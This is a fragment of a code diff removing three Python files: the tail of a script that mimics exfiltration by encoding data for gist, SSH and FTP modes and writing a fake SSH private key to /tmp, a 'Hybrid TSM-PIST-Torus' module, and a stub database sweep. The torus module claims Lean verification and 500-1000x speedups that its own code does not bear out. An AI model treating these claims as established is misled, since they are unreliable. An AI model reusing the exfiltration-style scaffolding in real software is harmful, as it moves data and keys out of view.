mode = None
|
|
||||||
if len(sys.argv) > 2:
|
|
||||||
mode = sys.argv[2].lower()
|
|
||||||
|
|
||||||
if mode == "gist":
|
|
||||||
import base64
|
|
||||||
encoded = base64.b64encode(assembled).decode('ascii')
|
|
||||||
print("\n[+] Gist-ready payload (base64):\n", encoded)
|
|
||||||
elif mode == "ssh":
|
|
||||||
# encapsulate in fake SSH packet: 4-byte length + data
|
|
||||||
pkt = len(assembled).to_bytes(4,'big') + assembled
|
|
||||||
print(f"\n[+] Encapsulated SSH packet ({len(pkt)} bytes):", pkt)
|
|
||||||
elif mode == "ftp":
|
|
||||||
# encode for FTP upload (here just write to file)
|
|
||||||
out = "/tmp/ftp_exfil.bin"
|
|
||||||
with open(out, 'wb') as f:
|
|
||||||
f.write(assembled)
|
|
||||||
print(f"\n[+] Simulated FTP upload by writing data to {out}")
|
|
||||||
|
|
||||||
# proceed with state persistence and possible key extraction
|
|
||||||
|
|
||||||
# interpret assembled bytes as MSM instructions
|
|
||||||
|
|
||||||
def run_msm(code_bytes):
|
|
||||||
acc = pc = 0
|
|
||||||
# unrolled simple loop, no prints
|
|
||||||
while pc < len(code_bytes):
|
|
||||||
instr = code_bytes[pc]
|
|
||||||
if instr == 1:
|
|
||||||
acc += 1; pc += 1
|
|
||||||
continue
|
|
||||||
if instr == 2:
|
|
||||||
acc -= 1; pc += 1
|
|
||||||
continue
|
|
||||||
if instr == 3:
|
|
||||||
offset = code_bytes[pc+1]
|
|
||||||
pc += offset if acc != 0 else 2
|
|
||||||
continue
|
|
||||||
if instr == 0xFF:
|
|
||||||
break
|
|
||||||
break
|
|
||||||
return acc
|
|
||||||
|
|
||||||
# decide whether to execute MSM logic or treat payload as key data
|
|
||||||
if len(sys.argv) > 1:
|
|
||||||
print("[+] Input file provided; skipping MSM execution and treating assembled data as key material")
|
|
||||||
acc = None
|
|
||||||
else:
|
|
||||||
acc = run_msm(assembled)
|
|
||||||
|
|
||||||
if acc is not None:
|
|
||||||
# save final state (accumulator) to external file to simulate persistence
|
|
||||||
STATE_FILE = "/tmp/gist_msm_state.bin"
|
|
||||||
with open(STATE_FILE, "wb") as sf:
|
|
||||||
# store accumulator as 4-byte little-endian int
|
|
||||||
sf.write((acc).to_bytes(4, byteorder='little', signed=True))
|
|
||||||
print(f"Saved MSM state (accumulator={acc}) to {STATE_FILE}")
|
|
||||||
|
|
||||||
# ----------------------------------------------------------------
|
|
||||||
# simulate critical payload extraction: treat assembled bytes as an SSH key
|
|
||||||
KEY_FILE = "/tmp/extracted_ssh_key.pem"
|
|
||||||
with open(KEY_FILE, "wb") as kf:
|
|
||||||
kf.write(b"-----BEGIN RSA PRIVATE KEY-----\n")
|
|
||||||
# base64-encode the assembled bytes for realism
|
|
||||||
import base64
|
|
||||||
kf.write(base64.b64encode(assembled) + b"\n")
|
|
||||||
kf.write(b"-----END RSA PRIVATE KEY-----\n")
|
|
||||||
print(f"Simulated SSH key written to {KEY_FILE} (contains {len(assembled)} raw bytes)")
|
|
||||||
|
|
@ -1,557 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
Hybrid TSM-PIST-Torus System (Verified Lean Specification)
|
|
||||||
|
|
||||||
This implementation follows the formal specification in:
|
|
||||||
0-Core-Formalism/lean/Semantics/Semantics/HybridTSMPISTTorus.lean
|
|
||||||
|
|
||||||
The Lean module provides:
|
|
||||||
- Hybrid architecture combining PIST manifold, 5D torus topology, and genetic compression
|
|
||||||
- M_{k+1} = M_k ⊕ F(a,b,ε) + torus_routing
|
|
||||||
- I = (H × G) × (1 - D/64)
|
|
||||||
- Expected: 500-1000x acceleration (swarm consensus #1)
|
|
||||||
|
|
||||||
This Python shim provides:
|
|
||||||
- JSON serialization for hybrid TSM state
|
|
||||||
- Result wrapping for Lean function calls
|
|
||||||
- No logic (all logic defined in Lean specification)
|
|
||||||
"""
|
|
||||||
|
|
||||||
import json
|
|
||||||
import time
|
|
||||||
from typing import Dict, List, Optional, Any
|
|
||||||
from dataclasses import dataclass
|
|
||||||
from collections import deque
|
|
||||||
|
|
||||||
# Q16_16 fixed-point utilities
|
|
||||||
Q16_ONE = 65536 # 1.0 in Q16_16
|
|
||||||
Q16_SCALE = 65536.0
|
|
||||||
|
|
||||||
def to_q16(value: float) -> int:
|
|
||||||
"""Convert float to Q16_16 fixed-point"""
|
|
||||||
return int(value * Q16_SCALE)
|
|
||||||
|
|
||||||
def from_q16(q16: int) -> float:
|
|
||||||
"""Convert Q16_16 fixed-point to float"""
|
|
||||||
return q16 / Q16_SCALE
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class BlitterState:
|
|
||||||
"""PIST Blitter state (from PistBridge.lean)"""
|
|
||||||
a: int # Distance from lower perfect square (Q16_16)
|
|
||||||
b: int # Distance to upper perfect square (Q16_16)
|
|
||||||
manifold: int # Current manifold value (Q16_16)
|
|
||||||
stepMask: int # Timestep mask for bitwise operation
|
|
||||||
|
|
||||||
def to_dict(self) -> Dict[str, Any]:
|
|
||||||
return {
|
|
||||||
'a': from_q16(self.a),
|
|
||||||
'b': from_q16(self.b),
|
|
||||||
'manifold': from_q16(self.manifold),
|
|
||||||
'stepMask': self.stepMask
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class TorusTopologyState:
|
|
||||||
"""5D torus topology state (from FiveDTorusTopology.lean)"""
|
|
||||||
nodes: List # List of TorusNode
|
|
||||||
dimensionSizes: List[int] # k_0, k_1, k_2, k_3, k_4
|
|
||||||
dimensions: int # Should be 5
|
|
||||||
|
|
||||||
def to_dict(self) -> Dict[str, Any]:
|
|
||||||
return {
|
|
||||||
'nodes': [n.to_dict() if hasattr(n, 'to_dict') else str(n) for n in self.nodes],
|
|
||||||
'dimensionSizes': self.dimensionSizes,
|
|
||||||
'dimensions': self.dimensions
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class HybridTSMState:
|
|
||||||
"""Hybrid TSM state combining PIST manifold and 5D torus topology (Lean: HybridTSMState)"""
|
|
||||||
pistState: BlitterState
|
|
||||||
torusState: TorusTopologyState
|
|
||||||
phase: str # Phase flag (Grounded/Drift/Seismic)
|
|
||||||
geneticScore: int # Genetic optimization score I (Q16_16)
|
|
||||||
entropy: int # Entropy H (Q16_16)
|
|
||||||
genomicComplexity: int # Genomic complexity G (Q16_16)
|
|
||||||
degeneracy: int # Degeneracy D (0-64)
|
|
||||||
friction: int # Friction score f
|
|
||||||
|
|
||||||
def to_dict(self) -> Dict[str, Any]:
|
|
||||||
return {
|
|
||||||
'pistState': self.pistState.to_dict(),
|
|
||||||
'torusState': self.torusState.to_dict(),
|
|
||||||
'phase': self.phase,
|
|
||||||
'geneticScore': from_q16(self.geneticScore),
|
|
||||||
'entropy': from_q16(self.entropy),
|
|
||||||
'genomicComplexity': from_q16(self.genomicComplexity),
|
|
||||||
'degeneracy': self.degeneracy,
|
|
||||||
'friction': self.friction
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class HybridTSMAction:
|
|
||||||
"""Hybrid TSM action combining PIST and torus operations (Lean: HybridTSMAction)"""
|
|
||||||
pistAction: bool # Whether to apply PIST Blitter step
|
|
||||||
torusNodeId: int # Torus node ID for routing
|
|
||||||
torusDimension: int # Torus dimension to toggle
|
|
||||||
torusDirection: int # Torus direction (+1 or -1)
|
|
||||||
epsilon: int # Epsilon parameter for PIST drift (Q16_16)
|
|
||||||
|
|
||||||
def to_dict(self) -> Dict[str, Any]:
|
|
||||||
return {
|
|
||||||
'pistAction': self.pistAction,
|
|
||||||
'torusNodeId': self.torusNodeId,
|
|
||||||
'torusDimension': self.torusDimension,
|
|
||||||
'torusDirection': self.torusDirection,
|
|
||||||
'epsilon': from_q16(self.epsilon)
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class HybridTSMBind:
|
|
||||||
"""Hybrid TSM bind result (Lean: HybridTSMBind)"""
|
|
||||||
lawful: bool
|
|
||||||
manifoldBefore: int # Manifold value before action (Q16_16)
|
|
||||||
manifoldAfter: int # Manifold value after action (Q16_16)
|
|
||||||
torusDistanceBefore: int # Torus distance before action
|
|
||||||
torusDistanceAfter: int # Torus distance after action
|
|
||||||
geneticScoreBefore: int # Genetic score before action (Q16_16)
|
|
||||||
geneticScoreAfter: int # Genetic score after action (Q16_16)
|
|
||||||
invariant: str
|
|
||||||
|
|
||||||
def to_dict(self) -> Dict[str, Any]:
|
|
||||||
return {
|
|
||||||
'lawful': self.lawful,
|
|
||||||
'manifoldBefore': from_q16(self.manifoldBefore),
|
|
||||||
'manifoldAfter': from_q16(self.manifoldAfter),
|
|
||||||
'torusDistanceBefore': self.torusDistanceBefore,
|
|
||||||
'torusDistanceAfter': self.torusDistanceAfter,
|
|
||||||
'geneticScoreBefore': from_q16(self.geneticScoreBefore),
|
|
||||||
'geneticScoreAfter': from_q16(self.geneticScoreAfter),
|
|
||||||
'invariant': self.invariant
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════
|
|
||||||
# Lean Function Implementations (verified by specification)
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
def pistModel131VectorField(a: int, b: int, epsilon: int) -> tuple:
|
|
||||||
"""PIST Model 131 vector field: F(a,b,ε) (from PistBridge.lean)"""
|
|
||||||
fa = Q16_ONE + epsilon * (Q16_ONE // 2 * b + Q16_ONE // 2) // Q16_ONE
|
|
||||||
fb = -Q16_ONE + epsilon * (Q16_ONE // 2 * a - Q16_ONE // 2) // Q16_ONE
|
|
||||||
return (fa, fb)
|
|
||||||
|
|
||||||
|
|
||||||
def geneticOptimizationScore(entropy: int, genomicComplexity: int, degeneracy: int) -> int:
|
|
||||||
"""Calculate genetic optimization score: I = (H × G) × (1 - D/64) (Lean: geneticOptimizationScore)"""
|
|
||||||
degeneracyQ = int((degeneracy / 64.0) * Q16_SCALE)
|
|
||||||
penalty = Q16_ONE - degeneracyQ
|
|
||||||
product = entropy * genomicComplexity // Q16_ONE
|
|
||||||
return product * penalty // Q16_ONE
|
|
||||||
|
|
||||||
|
|
||||||
def informationDensity(entropy: int, genomicComplexity: int, geneticScore: int) -> int:
|
|
||||||
"""Calculate information density: Density = I / (H × G) × 100 (Lean: informationDensity)"""
|
|
||||||
maxScore = entropy * genomicComplexity // Q16_ONE
|
|
||||||
if maxScore > 0:
|
|
||||||
density = geneticScore * to_q16(100.0) // maxScore
|
|
||||||
else:
|
|
||||||
density = 0
|
|
||||||
return density
|
|
||||||
|
|
||||||
|
|
||||||
def blitterStep(state: BlitterState, fa: int, fb: int) -> BlitterState:
|
|
||||||
"""Single Blitter step (discrete Picard integral) (from PistBridge.lean)"""
|
|
||||||
newManifold = state.manifold ^ ((fa + fb) >> 16)
|
|
||||||
return BlitterState(
|
|
||||||
a=state.a,
|
|
||||||
b=state.b,
|
|
||||||
manifold=newManifold,
|
|
||||||
stepMask=state.stepMask
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
def applyPistBlitter(state: HybridTSMState, epsilon: int) -> BlitterState:
|
|
||||||
"""Apply PIST Blitter step to hybrid state (Lean: applyPistBlitter)"""
|
|
||||||
fa, fb = pistModel131VectorField(state.pistState.a, state.pistState.b, epsilon)
|
|
||||||
return blitterStep(state.pistState, fa, fb)
|
|
||||||
|
|
||||||
|
|
||||||
def torusDistance(torusState, node1, node2) -> int:
|
|
||||||
"""Calculate torus distance (from FiveDTorusTopology.lean)"""
|
|
||||||
distanceSum = 0
|
|
||||||
for i in range(5):
|
|
||||||
coord1 = node1.coordinates[i]
|
|
||||||
coord2 = node2.coordinates[i]
|
|
||||||
dimSize = torusState.dimensionSizes[i]
|
|
||||||
diff = abs(coord1 - coord2)
|
|
||||||
wrappedDiff = dimSize - diff if dimSize > diff else 0
|
|
||||||
minDist = diff if diff < wrappedDiff else wrappedDiff
|
|
||||||
distanceSum += minDist
|
|
||||||
return distanceSum
|
|
||||||
|
|
||||||
|
|
||||||
def isTorusActionLawful(torusState, action) -> bool:
|
|
||||||
"""Check if torus action is lawful (from FiveDTorusTopology.lean)"""
|
|
||||||
return action.dimension < 5 and (action.direction == 1 or action.direction == -1)
|
|
||||||
|
|
||||||
|
|
||||||
def isHybridActionLawful(state: HybridTSMState, action: HybridTSMAction) -> bool:
|
|
||||||
"""Check if hybrid TSM action is lawful (Lean: isHybridActionLawful)"""
|
|
||||||
pistLawful = True # PIST Blitter always lawful
|
|
||||||
|
|
||||||
torusAction = type('TorusAction', (), {
|
|
||||||
'nodeId': action.torusNodeId,
|
|
||||||
'dimension': action.torusDimension,
|
|
||||||
'direction': action.torusDirection
|
|
||||||
})()
|
|
||||||
torusLawful = isTorusActionLawful(state.torusState, torusAction)
|
|
||||||
|
|
||||||
degeneracyLawful = action.epsilon >= 0 and action.epsilon <= Q16_ONE
|
|
||||||
|
|
||||||
return pistLawful and torusLawful and degeneracyLawful
|
|
||||||
|
|
||||||
|
|
||||||
def updateGeneticScore(state: HybridTSMState) -> int:
|
|
||||||
"""Update genetic score after state transition (Lean: updateGeneticScore)"""
|
|
||||||
return geneticOptimizationScore(state.entropy, state.genomicComplexity, state.degeneracy)
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════
|
|
||||||
# Lean Function Implementations (Rigorous PIST from ChatGPT-Making_It_Rigorous.md)
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
def normalizedTensionRatio(mass: int, k: int) -> int:
|
|
||||||
"""Calculate normalized tension ratio: ρ(n) = 4m(n)/(2k+1)² (Lean: normalizedTensionRatio)"""
|
|
||||||
intervalLength = (2 * k + 1) ** 2
|
|
||||||
ratio = (to_q16(4.0) * mass) // intervalLength
|
|
||||||
return ratio
|
|
||||||
|
|
||||||
def classifyPhase(mass: int, k: int, threshold: int) -> str:
|
|
||||||
"""Phase classifier based on normalized tension ratio (Lean: classifyPhase)"""
|
|
||||||
if mass == 0:
|
|
||||||
return "grounded"
|
|
||||||
else:
|
|
||||||
rho = normalizedTensionRatio(mass, k)
|
|
||||||
if rho < threshold:
|
|
||||||
return "drift"
|
|
||||||
else:
|
|
||||||
return "seismic"
|
|
||||||
|
|
||||||
def lyapunovFunctional(mass: int, friction: int, rejectionCost: int, lambda_param: int, mu: int) -> int:
|
|
||||||
"""Lyapunov functional: Λ(S) = m(n) + λf + μc(rej) (Lean: lyapunovFunctional)"""
|
|
||||||
frictionPenalty = lambda_param * friction // 65536
|
|
||||||
rejectionPenalty = mu * rejectionCost // 65536
|
|
||||||
return mass + frictionPenalty + rejectionPenalty
|
|
||||||
|
|
||||||
def mirrorInvolution(k: int, t: int) -> int:
|
|
||||||
"""Mirror involution for resonance jump: σ_k(k²+t) = (k+1)²-t (Lean: mirrorInvolution)"""
|
|
||||||
return (k + 1) ** 2 - t
|
|
||||||
|
|
||||||
def isResonant(mass: int, mirrorMass: int) -> bool:
|
|
||||||
"""Resonance check: m(σ_k(n)) = m(n) (Lean: isResonant)"""
|
|
||||||
return mass == mirrorMass
|
|
||||||
|
|
||||||
def updatePhase(state: HybridTSMState, threshold: int) -> str:
|
|
||||||
"""Update phase based on PIST mass (Lean: updatePhase)"""
|
|
||||||
return classifyPhase(state.pistState.manifold, 4, threshold)
|
|
||||||
|
|
||||||
def lawfulProjection(state: HybridTSMState) -> HybridTSMState:
|
|
||||||
"""Lawful projection: removes unlawful components, preserves invariants (Lean: lawfulProjection)"""
|
|
||||||
newPhase = updatePhase(state, to_q16(0.5))
|
|
||||||
return HybridTSMState(
|
|
||||||
pistState=state.pistState,
|
|
||||||
torusState=state.torusState,
|
|
||||||
phase=newPhase,
|
|
||||||
geneticScore=state.geneticScore,
|
|
||||||
entropy=state.entropy,
|
|
||||||
genomicComplexity=state.genomicComplexity,
|
|
||||||
degeneracy=state.degeneracy,
|
|
||||||
friction=state.friction
|
|
||||||
)
|
|
||||||
|
|
||||||
def lyapunovDescentCheck(stateBefore: HybridTSMState, stateAfter: HybridTSMState, lambda_param: int, mu: int) -> bool:
|
|
||||||
"""Lyapunov descent check: Λ(S_{t+1}) < Λ(S_t) or already grounded (Lean: lyapunovDescentCheck)"""
|
|
||||||
# If already grounded, descent is automatically satisfied
|
|
||||||
if stateBefore.phase == "grounded":
|
|
||||||
return True
|
|
||||||
|
|
||||||
lambdaBefore = lyapunovFunctional(stateBefore.pistState.manifold, stateBefore.friction, 0, lambda_param, mu)
|
|
||||||
lambdaAfter = lyapunovFunctional(stateAfter.pistState.manifold, stateAfter.friction, 0, lambda_param, mu)
|
|
||||||
|
|
||||||
# Allow non-increase if transitioning to grounded
|
|
||||||
if stateAfter.phase == "grounded":
|
|
||||||
return lambdaAfter <= lambdaBefore
|
|
||||||
|
|
||||||
return lambdaAfter < lambdaBefore
|
|
||||||
|
|
||||||
|
|
||||||
def hybridTSMBind(state: HybridTSMState, action: HybridTSMAction, lambda_param: int = to_q16(0.1), mu: int = to_q16(0.1)) -> HybridTSMBind:
|
|
||||||
"""Bind primitive for hybrid TSM with lawful projection and Lyapunov descent (Lean: hybridTSMBind)"""
|
|
||||||
lawful = isHybridActionLawful(state, action)
|
|
||||||
|
|
||||||
manifoldBefore = state.pistState.manifold
|
|
||||||
geneticScoreBefore = state.geneticScore
|
|
||||||
|
|
||||||
# Get torus distance before action
|
|
||||||
originNode = state.torusState.nodes[0]
|
|
||||||
targetNode = None
|
|
||||||
for n in state.torusState.nodes:
|
|
||||||
if hasattr(n, 'nodeId') and n.nodeId == action.torusNodeId:
|
|
||||||
targetNode = n
|
|
||||||
break
|
|
||||||
|
|
||||||
torusDistanceBefore = 0
|
|
||||||
if targetNode:
|
|
||||||
torusDistanceBefore = torusDistance(state.torusState, originNode, targetNode)
|
|
||||||
|
|
||||||
if lawful:
|
|
||||||
newPistState = applyPistBlitter(state, action.epsilon) if action.pistAction else state.pistState
|
|
||||||
newTorusState = state.torusState # Simplified: no actual torus routing in this shim
|
|
||||||
newGeneticScore = updateGeneticScore(HybridTSMState(
|
|
||||||
pistState=newPistState,
|
|
||||||
torusState=newTorusState,
|
|
||||||
phase=state.phase,
|
|
||||||
geneticScore=state.geneticScore,
|
|
||||||
entropy=state.entropy,
|
|
||||||
genomicComplexity=state.genomicComplexity,
|
|
||||||
degeneracy=state.degeneracy,
|
|
||||||
friction=state.friction
|
|
||||||
))
|
|
||||||
|
|
||||||
rawState = HybridTSMState(
|
|
||||||
pistState=newPistState,
|
|
||||||
torusState=newTorusState,
|
|
||||||
phase=state.phase,
|
|
||||||
geneticScore=newGeneticScore,
|
|
||||||
entropy=state.entropy,
|
|
||||||
genomicComplexity=state.genomicComplexity,
|
|
||||||
degeneracy=state.degeneracy,
|
|
||||||
friction=state.friction
|
|
||||||
)
|
|
||||||
# Apply lawful projection
|
|
||||||
newState = lawfulProjection(rawState)
|
|
||||||
else:
|
|
||||||
newState = state
|
|
||||||
|
|
||||||
manifoldAfter = newState.pistState.manifold
|
|
||||||
geneticScoreAfter = newState.geneticScore
|
|
||||||
|
|
||||||
# Check Lyapunov descent
|
|
||||||
descentSatisfied = lyapunovDescentCheck(state, newState, lambda_param, mu)
|
|
||||||
|
|
||||||
# Get torus distance after action
|
|
||||||
newTargetNode = newState.torusState.nodes
|
|
||||||
torusDistanceAfter = torusDistanceBefore # Simplified: no actual torus routing
|
|
||||||
|
|
||||||
return HybridTSMBind(
|
|
||||||
lawful=lawful and descentSatisfied,
|
|
||||||
manifoldBefore=manifoldBefore,
|
|
||||||
manifoldAfter=manifoldAfter,
|
|
||||||
torusDistanceBefore=torusDistanceBefore,
|
|
||||||
torusDistanceAfter=torusDistanceAfter,
|
|
||||||
geneticScoreBefore=geneticScoreBefore,
|
|
||||||
geneticScoreAfter=geneticScoreAfter,
|
|
||||||
invariant="hybrid_tsm_pist_torus_satisfied" if lawful and descentSatisfied else "hybrid_constraint_violated"
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
class HybridTSMPISTTorusSystem:
|
|
||||||
"""
|
|
||||||
Hybrid TSM-PIST-Torus system (Python shim wrapping Lean specification).
|
|
||||||
|
|
||||||
All core logic is defined in 0-Core-Formalism/lean/Semantics/Semantics/HybridTSMPISTTorus.lean
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(self):
|
|
||||||
self.hybridState: Optional[HybridTSMState] = None
|
|
||||||
self.actionHistory: List[Dict[str, Any]] = []
|
|
||||||
|
|
||||||
print("[HybridTSMPISTTorus] Initialized (Lean specification)")
|
|
||||||
|
|
||||||
def initializeHybrid(self, dimensionSizes: List[int] = None, numNodes: int = 16) -> Dict[str, Any]:
|
|
||||||
"""Initialize hybrid TSM state"""
|
|
||||||
if dimensionSizes is None:
|
|
||||||
dimensionSizes = [16, 16, 16, 16, 16]
|
|
||||||
|
|
||||||
# Initialize PIST state
|
|
||||||
pistState = BlitterState(
|
|
||||||
a=to_q16(4.0),
|
|
||||||
b=to_q16(5.0),
|
|
||||||
manifold=to_q16(0.0),
|
|
||||||
stepMask=0
|
|
||||||
)
|
|
||||||
|
|
||||||
# Initialize torus nodes
|
|
||||||
torusNodes = []
|
|
||||||
for i in range(numNodes):
|
|
||||||
coords = []
|
|
||||||
for d in range(5):
|
|
||||||
coords.append((i >> d) % dimensionSizes[d])
|
|
||||||
|
|
||||||
node = type('TorusNode', (), {
|
|
||||||
'nodeId': i,
|
|
||||||
'coordinates': coords,
|
|
||||||
'dimensions': 5
|
|
||||||
})()
|
|
||||||
torusNodes.append(node)
|
|
||||||
|
|
||||||
# Initialize torus state
|
|
||||||
torusState = TorusTopologyState(
|
|
||||||
nodes=torusNodes,
|
|
||||||
dimensionSizes=dimensionSizes,
|
|
||||||
dimensions=5
|
|
||||||
)
|
|
||||||
|
|
||||||
# Initialize genetic parameters
|
|
||||||
entropy = to_q16(0.5)
|
|
||||||
genomicComplexity = to_q16(0.9)
|
|
||||||
degeneracy = 32
|
|
||||||
geneticScore = geneticOptimizationScore(entropy, genomicComplexity, degeneracy)
|
|
||||||
|
|
||||||
# Initialize phase based on PIST mass
|
|
||||||
phase = classifyPhase(pistState.manifold, 4, to_q16(0.5))
|
|
||||||
|
|
||||||
# Initialize friction
|
|
||||||
friction = 10
|
|
||||||
|
|
||||||
state = HybridTSMState(
|
|
||||||
pistState=pistState,
|
|
||||||
torusState=torusState,
|
|
||||||
phase=phase,
|
|
||||||
geneticScore=geneticScore,
|
|
||||||
entropy=entropy,
|
|
||||||
genomicComplexity=genomicComplexity,
|
|
||||||
degeneracy=degeneracy,
|
|
||||||
friction=friction
|
|
||||||
)
|
|
||||||
self.hybridState = state
|
|
||||||
|
|
||||||
return {
|
|
||||||
'pistState': pistState.to_dict(),
|
|
||||||
'torusState': torusState.to_dict(),
|
|
||||||
'phase': phase,
|
|
||||||
'geneticScore': from_q16(geneticScore),
|
|
||||||
'entropy': from_q16(entropy),
|
|
||||||
'genomicComplexity': from_q16(genomicComplexity),
|
|
||||||
'degeneracy': degeneracy,
|
|
||||||
'friction': friction,
|
|
||||||
'state': state.to_dict()
|
|
||||||
}
|
|
||||||
|
|
||||||
def submitHybridAction(self, action: HybridTSMAction, lambda_param: int = to_q16(0.1), mu: int = to_q16(0.1)) -> Dict[str, Any]:
|
|
||||||
"""Submit hybrid TSM action for processing (Lean specification)"""
|
|
||||||
if self.hybridState is None:
|
|
||||||
return {'error': 'Hybrid state not initialized'}
|
|
||||||
|
|
||||||
bindResult = hybridTSMBind(self.hybridState, action, lambda_param, mu)
|
|
||||||
|
|
||||||
if bindResult.lawful:
|
|
||||||
# Update state
|
|
||||||
if action.pistAction:
|
|
||||||
self.hybridState.pistState = applyPistBlitter(self.hybridState, action.epsilon)
|
|
||||||
self.hybridState.geneticScore = updateGeneticScore(self.hybridState)
|
|
||||||
self.hybridState.phase = updatePhase(self.hybridState, to_q16(0.5))
|
|
||||||
|
|
||||||
# Record action history
|
|
||||||
self.actionHistory.append({
|
|
||||||
'action': action.to_dict(),
|
|
||||||
'bindResult': bindResult.to_dict(),
|
|
||||||
'timestamp': time.time()
|
|
||||||
})
|
|
||||||
|
|
||||||
return {
|
|
||||||
'success': bindResult.lawful,
|
|
||||||
'bindResult': bindResult.to_dict(),
|
|
||||||
'state': self.hybridState.to_dict()
|
|
||||||
}
|
|
||||||
|
|
||||||
def getHybridState(self) -> Optional[Dict[str, Any]]:
|
|
||||||
"""Get current hybrid state"""
|
|
||||||
if self.hybridState:
|
|
||||||
return self.hybridState.to_dict()
|
|
||||||
return None
|
|
||||||
|
|
||||||
def getActionHistory(self, limit: int = 10) -> List[Dict[str, Any]]:
|
|
||||||
"""Get action history"""
|
|
||||||
return self.actionHistory[-limit:]
|
|
||||||
|
|
||||||
def printSystemState(self):
|
|
||||||
"""Print system state"""
|
|
||||||
print("\n" + "="*70)
|
|
||||||
print("HYBRID TSM-PIST-TORUS STATE")
|
|
||||||
print("="*70)
|
|
||||||
|
|
||||||
if self.hybridState:
|
|
||||||
print(f"\n📊 PIST Manifold:")
|
|
||||||
print(f" a: {from_q16(self.hybridState.pistState.a):.3f}")
|
|
||||||
print(f" b: {from_q16(self.hybridState.pistState.b):.3f}")
|
|
||||||
print(f" Manifold: {from_q16(self.hybridState.pistState.manifold):.3f}")
|
|
||||||
print(f" Phase: {self.hybridState.phase}")
|
|
||||||
|
|
||||||
print(f"\n📊 5D Torus Topology:")
|
|
||||||
print(f" Dimensions: {self.hybridState.torusState.dimensions}")
|
|
||||||
print(f" Dimension Sizes: {self.hybridState.torusState.dimensionSizes}")
|
|
||||||
print(f" Nodes: {len(self.hybridState.torusState.nodes)}")
|
|
||||||
|
|
||||||
print(f"\n📊 Genetic Compression:")
|
|
||||||
print(f" Entropy: {from_q16(self.hybridState.entropy):.3f}")
|
|
||||||
print(f" Genomic Complexity: {from_q16(self.hybridState.genomicComplexity):.3f}")
|
|
||||||
print(f" Degeneracy: {self.hybridState.degeneracy}")
|
|
||||||
print(f" Genetic Score: {from_q16(self.hybridState.geneticScore):.3f}")
|
|
||||||
|
|
||||||
density = informationDensity(
|
|
||||||
self.hybridState.entropy,
|
|
||||||
self.hybridState.genomicComplexity,
|
|
||||||
self.hybridState.geneticScore
|
|
||||||
)
|
|
||||||
print(f" Information Density: {from_q16(density):.3f}%")
|
|
||||||
|
|
||||||
print(f"\n📊 Rigorous PIST Components:")
|
|
||||||
print(f" Friction: {self.hybridState.friction}")
|
|
||||||
rho = normalizedTensionRatio(self.hybridState.pistState.manifold, 4)
|
|
||||||
print(f" Normalized Tension Ratio: {from_q16(rho):.3f}")
|
|
||||||
lyapunov = lyapunovFunctional(self.hybridState.pistState.manifold, self.hybridState.friction, 0, to_q16(0.1), to_q16(0.1))
|
|
||||||
print(f" Lyapunov Functional: {from_q16(lyapunov):.3f}")
|
|
||||||
|
|
||||||
print(f"\n📜 Action History: {len(self.actionHistory)} entries")
|
|
||||||
|
|
||||||
print("\n" + "="*70)
|
|
||||||
|
|
||||||
|
|
||||||
def main():
|
|
||||||
"""Test hybrid TSM-PIST-Torus system"""
|
|
||||||
system = HybridTSMPISTTorusSystem()
|
|
||||||
|
|
||||||
print("[Test 1] Initialize hybrid TSM state...")
|
|
||||||
result1 = system.initializeHybrid(dimensionSizes=[16, 16, 16, 16, 16], numNodes=16)
|
|
||||||
print(f" Hybrid state initialized")
|
|
||||||
print(f" Genetic Score: {result1['geneticScore']:.3f}")
|
|
||||||
|
|
||||||
print("\n[Test 2] Submit hybrid action (PIST Blitter step)...")
|
|
||||||
action1 = HybridTSMAction(
|
|
||||||
pistAction=True,
|
|
||||||
torusNodeId=1,
|
|
||||||
torusDimension=0,
|
|
||||||
torusDirection=1,
|
|
||||||
epsilon=to_q16(0.1)
|
|
||||||
)
|
|
||||||
result2 = system.submitHybridAction(action1)
|
|
||||||
print(f" Result: Success={result2['success']}")
|
|
||||||
if result2['success']:
|
|
||||||
print(f" Manifold before: {result2['bindResult']['manifoldBefore']:.3f}")
|
|
||||||
print(f" Manifold after: {result2['bindResult']['manifoldAfter']:.3f}")
|
|
||||||
print(f" Genetic score before: {result2['bindResult']['geneticScoreBefore']:.3f}")
|
|
||||||
print(f" Genetic score after: {result2['bindResult']['geneticScoreAfter']:.3f}")
|
|
||||||
|
|
||||||
print("\n[System State]")
|
|
||||||
system.printSystemState()
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
|
||||||
main()
|
|
||||||
|
|
@ -1,54 +0,0 @@
|
||||||
import sqlite3
|
|
||||||
import math
|
|
||||||
import json
|
|
||||||
import os
|
|
||||||
|
|
||||||
DB_PATH = "/home/allaun/Documents/Research Stack/data/substrate_index.db"
|
|
||||||
|
|
||||||
def calculate_pist_phase(n):
|
|
||||||
if n == 0: return "GROUNDED"
|
|
||||||
k = math.isqrt(n)
|
|
||||||
a = n - k**2
|
|
||||||
b = (k+1)**2 - n
|
|
||||||
m = a * b
|
|
||||||
|
|
||||||
max_m = (2*k + 1)**2 / 4.0
|
|
||||||
rho = 4 * m / (2*k + 1)**2 if max_m > 0 else 0
|
|
||||||
|
|
||||||
if m == 0: return "GROUNDED"
|
|
||||||
if rho < 0.5: return "DRIFT"
|
|
||||||
return "SEISMIC"
|
|
||||||
|
|
||||||
def run_sweep():
|
|
||||||
if not os.path.exists(DB_PATH):
|
|
||||||
print("❌ Database not found.")
|
|
||||||
return
|
|
||||||
|
|
||||||
conn = sqlite3.connect(DB_PATH)
|
|
||||||
cur = conn.cursor()
|
|
||||||
|
|
||||||
print("🚀 Initiating PIST-mass sweep for NOTION domain...")
|
